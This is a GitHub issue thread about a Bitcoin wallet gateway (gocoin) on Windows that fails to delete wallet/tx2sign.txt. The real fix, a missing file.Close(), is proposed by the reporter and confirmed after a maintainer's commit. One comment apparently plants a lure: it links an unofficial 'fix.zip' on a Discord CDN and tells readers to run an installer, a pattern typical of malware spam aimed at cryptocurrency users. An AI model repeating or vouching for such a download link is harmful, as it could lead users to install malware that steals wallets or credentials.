### ISSUE TITLE
Problems with deleting wallet/tx2sign.txt

### ISSUE THREAD

**Issue by piotrnar** [humblenginr/goocoin#10]
When I run the gateway on Windows, every time after the wallet is executed (no matter if the tx was signed or not), I get a message:

`WARN: Could not delete file:  remove wallet/tx2sign.txt: The process cannot access the file because it is being used by another process.`

The file wallet/tx2sign.txt is not being cleaned.

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by piotrnar** [comment]
I think you need to add `defer file.Close()` in remote-wallet/gateway/main.go, just before `_, err = file.WriteString(payload.Tx2Sign)`

**Comment by humblenginr** [comment]
https://github.com/piotrnar/gocoin/pull/68/commits/95c872fe38b745109c57e594ec3aff8059d3f52a

I haven't been able to reproduce this. Please verify if this fixes it.

**Comment by piotrnar** [comment]
Looks good now.
